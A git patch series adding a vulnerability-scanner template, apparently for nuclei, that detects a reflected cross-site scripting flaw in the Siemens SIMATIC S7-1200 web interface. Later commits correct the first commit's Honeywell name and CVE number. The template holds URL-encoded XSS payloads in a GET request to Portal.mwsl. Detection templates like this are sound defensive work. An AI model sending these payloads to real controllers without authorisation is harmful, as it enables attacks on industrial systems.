From f8771cea8fd11659383df19c7e5dd09fa2a23e76 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Mon, 6 Dec 2021 22:13:40 +0700 Subject: [PATCH 1/3] Create CVE-2014-3110.yaml --- cves/2014/CVE-2014-3110.yaml | 25 +++++++++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 cves/2014/CVE-2014-3110.yaml diff --git a/cves/2014/CVE-2014-3110.yaml b/cves/2014/CVE-2014-3110.yaml new file mode 100644 index 0000000000..9b22f17e87 --- /dev/null +++ b/cves/2014/CVE-2014-3110.yaml @@ -0,0 +1,25 @@ +id: CVE-2014-3110 + +info: + name: Honeywell XL Web Controller - Reflected Cross-Site Scripting + author: daffainfo + severity: medium + description: Cross-site scripting (XSS) vulnerability in the integrated web server on Siemens SIMATIC S7-1200 CPU devices 2.x and 3.x allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. + reference: https://www.exploit-db.com/exploits/44687 + tags: cve,cve2014,xss,siemens + +requests: + - method: GET + path: + - '{{BaseURL}}/Portal/Portal.mwsl?PriNav=Bgz&filtername=Name&filtervalue=%22%3E%3Cimg%20src%3Dx%20onerror%3Dprompt%281%29%3B%3E&Send=Filter' + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + part: body + words: + - '">' From f0fbe930f6728c83497bab9e9728d0c9bbc9875a Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 7 Dec 2021 10:23:35 +0530 Subject: [PATCH 2/3] Update CVE-2014-3110.yaml --- cves/2014/CVE-2014-3110.yaml | 23 +++++++++++++++-------- 1 file changed, 15 insertions(+), 8 deletions(-) diff --git a/cves/2014/CVE-2014-3110.yaml b/cves/2014/CVE-2014-3110.yaml index 9b22f17e87..19ef427364 100644 --- a/cves/2014/CVE-2014-3110.yaml +++ b/cves/2014/CVE-2014-3110.yaml @@ -5,21 +5,28 @@ info: author: daffainfo severity: medium description: Cross-site scripting (XSS) vulnerability in the integrated web server on Siemens SIMATIC S7-1200 CPU devices 2.x and 3.x allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. - reference: https://www.exploit-db.com/exploits/44687 - tags: cve,cve2014,xss,siemens + reference: + - https://www.exploit-db.com/exploits/44749 + - https://nvd.nist.gov/vuln/detail/CVE-2014-3110 + tags: cve,cve2014,xss,honeywell requests: - method: GET path: - - '{{BaseURL}}/Portal/Portal.mwsl?PriNav=Bgz&filtername=Name&filtervalue=%22%3E%3Cimg%20src%3Dx%20onerror%3Dprompt%281%29%3B%3E&Send=Filter' + - '{{BaseURL}}/Portal/Portal.mwsl?PriNav=Bgz&filtername=Name&filtervalue=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&Send=Filter' matchers-condition: and matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + - type: status status: - 200 - - - type: word - part: body - words: - - '">' From 7983f04c51e792fc02855f437b6a3ed6ceb2b3f8 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 7 Dec 2021 10:28:21 +0530 Subject: [PATCH 3/3] Update and rename CVE-2014-3110.yaml to CVE-2014-2908.yaml --- cves/2014/{CVE-2014-3110.yaml => CVE-2014-2908.yaml} | 12 ++++++------ 1 file changed, 6 insertions(+), 6 deletions(-) rename cves/2014/{CVE-2014-3110.yaml => CVE-2014-2908.yaml} (77%) diff --git a/cves/2014/CVE-2014-3110.yaml b/cves/2014/CVE-2014-2908.yaml similarity index 77% rename from cves/2014/CVE-2014-3110.yaml rename to cves/2014/CVE-2014-2908.yaml index 19ef427364..2b589fa8fe 100644 --- a/cves/2014/CVE-2014-3110.yaml +++ b/cves/2014/CVE-2014-2908.yaml @@ -1,14 +1,14 @@ -id: CVE-2014-3110 +id: CVE-2014-2908 info: - name: Honeywell XL Web Controller - Reflected Cross-Site Scripting + name: Siemens SIMATIC S7-1200 CPU - Cross-Site Scripting author: daffainfo severity: medium description: Cross-site scripting (XSS) vulnerability in the integrated web server on Siemens SIMATIC S7-1200 CPU devices 2.x and 3.x allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. reference: - - https://www.exploit-db.com/exploits/44749 - - https://nvd.nist.gov/vuln/detail/CVE-2014-3110 - tags: cve,cve2014,xss,honeywell + - https://www.exploit-db.com/exploits/44687 + - https://nvd.nist.gov/vuln/detail/CVE-2014-2908 + tags: cve,cve2014,xss,siemens requests: - method: GET @@ -18,9 +18,9 @@ requests: matchers-condition: and matchers: - type: word + part: body words: - "" - part: body - type: word part: header